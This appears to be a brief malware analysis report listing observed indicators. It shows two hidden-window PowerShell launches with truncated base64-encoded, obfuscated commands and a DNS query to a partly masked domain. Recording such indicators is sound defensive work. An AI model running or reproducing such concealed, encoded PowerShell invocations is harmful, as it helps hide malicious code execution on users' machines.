Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e IAAmACgAIAAkAFMASABlAGwATABpAGQAWwAxAF0AKwAkAFMASABlAGwATABJAGQAWwAxADMAXQArACcAeAAnACkAIAAoACgAKAAoACIAewA0ADAAfQB7ADUANgB9AHsAMQAyAH0AewA1ADgAfQB7ADIAMgB9AHsAOAAyAH0Aew...
- DNS ASK mn####qhwebw.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e IAAmACgAIAAkAFMASABlAGwATABpAGQAWwAxAF0AKwAkAFMASABlAGwATABJAGQAWwAxADMAXQArACcAeAAnACkAIAAoACgAKAAoACIAewA0ADAAfQB7ADUANgB9AHsAMQAyAH0AewA1ADgAfQB7ADIAMgB9AHsAOAAyAH0Aew...' (with hidden window)